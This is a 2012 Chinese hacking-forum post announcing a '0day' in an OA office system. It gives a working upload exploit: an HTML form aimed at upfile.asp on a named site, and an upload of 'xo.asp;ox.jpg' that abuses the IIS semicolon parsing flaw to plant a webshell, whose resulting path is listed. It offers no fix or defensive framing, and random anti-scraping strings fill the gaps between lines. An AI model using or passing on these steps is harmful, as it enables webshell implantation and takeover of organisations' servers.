中国网络渗透测试联盟
标题:
全能OA办公系统0day OA办公系统漏洞 上传漏洞
[打印本页]
作者:
admin
时间:
2012-11-21 13:45
标题:
全能OA办公系统0day OA办公系统漏洞 上传漏洞
全能OA办公系统 上传漏洞
9 Z" Q( S8 U8 O" s4 V- t9 _
N( N/ q, B$ `8 S/ {$ W# F, o
系统介绍:
/ T- i* u1 i, K5 e) ]
, T9 X+ F. g+ a/ f- p
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
1 t* w* }! B; L* g% c3 I0 P0 g- E; h
1 O* k& F0 z1 g. Q
主要功能:
* H% J9 s$ b: z# X9 p
公司通告
1 X: Z6 `- U& U2 C
工作计划
4 X; O' _& \" \3 a. k8 ^
通讯助理
" J$ [* ?0 }, n! r% M
客户资源
$ @! `* \# I5 T8 z2 c" o
我的公文
- l6 o/ [. _6 l; \$ j- f
公文传阅
7 v8 x2 b+ f+ E5 Q
公共资源
! ~& ~2 [9 y3 N _
资源预约
* W- @) Z5 Q9 C: @2 ?. ~4 G
今日考勤
, ~/ Q3 m" b. n. ~0 v1 i
个人计划
& }; ]/ u7 x7 |# N9 k9 Q7 ^- C
个人通讯录
3 \( P8 f: @4 G; I
个人基本档案
/ B4 f+ e1 k- Q8 t5 C j3 W; ?: S
未读邮件
* L* ?) }& ^9 K1 A$ V) O
发邮件
9 {. N! i2 c4 [: B! x$ x: h
收件夹
6 O5 S( g9 A2 w; M. j
寄件夹
F) }' `/ \' {# \/ K4 t
网络硬盘
# w% ?3 v4 n9 d8 }
网络会议
1 j& @) @) l5 D2 D) ~
网络调查
" X- k$ v) v# _
交流论坛
" V- V; Q8 P" {1 h& p
7 M* w( v2 }8 b) \; Y; S) z
有兴趣测试的朋友可以下源码看看
4 ?$ m c* k3 X
1 [( k( U' o1 n8 A' Y% Q! @
源码下载:
8 D# c$ Y7 v e& E$ [8 E4 k; H
1 I) K5 m: a1 X8 F2 Z$ }
http://www.mycodes.net/30/4750.htm
* J& q3 H; [6 i& {
5 c* o5 }$ n, Q" f) I
漏洞介绍:
( @7 d8 C, p5 Q/ y7 b* _
5 V, ^# w' D9 W9 J2 Z
由upfile.asp上传文件漏洞引起
8 Q J8 G! K' n1 A7 M7 V
7 p, H+ \2 l7 e" l" F/ ]4 b
测试方法:
( q2 D u3 E$ g- N% {
9 F$ I9 H8 \9 m I" a, K8 h. M
使用名小子上传
http://www.itlynn.com/upfile.asp
即可
! _, P! @( y9 y, \
- ]: l1 N6 `1 V' E7 \; {6 I S/ T9 v
如果upfile.asp文件被删除不存在。
, I" l$ L' T2 l: U3 A
: d' v- M T P3 a
那么可以试着访问
http://www.itlynn.com/upfile/upfile.asp
。
* A$ _! Y5 l4 m2 z
" @ e n& ?% B1 z- o5 {: r2 W# k, w
如果存在那么将如下代码保存为upfile.html。
/ q: z6 H4 l# T- a( M. s
8 a3 k) ?6 k5 ?* w( _
然后将action的参数修改为目标站点的url。例如
http://www.itlynn.com/upfile/upfile.asp
。
# u7 Z5 U7 p5 U ~6 u& N, o
% W0 d: {6 @" V) }9 g6 g& ~8 T- L
- `# s7 D3 ]( @5 }# k0 t* F
( v' \' [! _" d; M+ \
01 <table border='0' align="center" cellpadding="5">
9 s1 O) v' j& \, C3 f- r
+ F, I3 X( [( p- |& l2 @
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
- i T' F! }. h7 |3 f
% v2 L# A1 ?: S4 J$ h4 V3 @
03 <tr>
0 S7 u9 i+ r! K
6 j7 R9 x9 v; M7 I$ K
04 <td>报错:</td>
4 q! b. | f5 l- V G" s
' v$ T2 c" Y7 P! V6 L& @
05 <td><input type='radio' name='errnumber' value='0'>
8 e8 h+ Z! p& q. ~8 e7 v
5 N! @" K8 v. ]& ` S3 S- f9 W
06 自动更名
( r6 c3 {0 @+ s5 ?
% P. o$ N5 o9 H3 J! {
07 <input type='radio' name='errnumber' value='1' checked>
Z& u& }) {; E1 y( O0 ~- K5 H" O
/ l; W8 ?2 T* U1 m
08 报错方式
6 f2 {3 L4 [0 p3 n; ]+ _
' `' ]% ~+ {$ ~. b9 _) g
09 <input type='radio' name='errnumber' value='2'>
* W( B6 K, @- E" J m) r' [% O
+ ~1 ~ D+ g Y- o B
10 直接覆盖</td>
* ~# z7 ]0 m! r/ ~# E
* X( V" X' D, R1 C3 z4 v' h
11 </tr>
5 E. z/ v& J% j
9 R9 ]: f% x8 q( N
12 <tr>
% z+ w. G1 |/ m t
, ~" `9 n% H) }2 \8 b7 N2 {
13 <td>主题:</td>
6 B( H; a4 U) D/ J3 y
1 O2 D4 d) ^# @
14 <td><input type='text' name='filename' size='30'></td>
# m' ~1 t- i% v0 [ [$ c! x% g
; ?, h5 u" g ~/ R
15 </tr>
3 X. k9 T0 `/ p2 J4 Z* U0 p! G
Z; i: V0 `" \$ a8 w6 u+ v
16 <tr>
+ Y: Q; z- O$ `# U
) O7 H. S, k$ H- h; ]0 B
17 <td>文件:</td>
2 w" p0 ^0 c0 q2 P2 {) L7 h
+ |5 x8 v1 c3 ]! B, @$ R7 r% R2 ?
18 <td><input type="file"name="fruit"size="30"></td>
! x$ p5 m* G0 @' m3 C7 Y8 w/ [
% g, P2 Z+ g( k0 r6 ~+ s' d# A6 @
19 </tr>
" ^' M: ]- a+ N
9 p' T: d x" \! m v
20 <tr>
, _5 C! p# {3 ~. q# ~% l
1 `0 S' S3 e0 W2 t4 G* ^5 ]; ]; P
21 <td valign='top'>简介:</td>
) u; N+ m; y* c) H4 g0 t$ k- y
% L. p* i# ^( Z# j$ P7 Z) G. h
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
6 _4 g) W" S3 x
$ P& n4 [' Y& b( m) Z( q
23 </tr>
4 F: c/ l8 C1 M) y X* _; K
4 F/ y. i% M& M
24
- f* b! s/ e) `
3 M% h, H7 D% q5 \6 g) U3 ^0 @9 ~
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
3 w3 q2 ]5 { H$ A8 {5 D- ^
4 x) U3 q2 [1 q4 q6 |& B4 n
26 </tr>
, f& T2 o3 J3 a8 {/ b9 X
2 h; Y* a* Y) s f H- c8 R
27 </form>
0 R" N' o- {( B- O' c Y
" k/ A O% d* J2 R p( [
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
8 w* L) I& v+ n
' `- H$ }7 D2 `, `
8 p- @, u6 n [/ w
8 e% W, Q. x/ x9 e( B
上传成功后,马的路径是:
http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
1 e3 U4 c- `3 q0 M$ r9 h
% @7 l6 c2 {2 G4 U6 N
此漏洞需要配合解析漏洞利用。
5 T& S$ i N8 r0 a1 P
7 D, n- K$ |! v/ c2 R
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2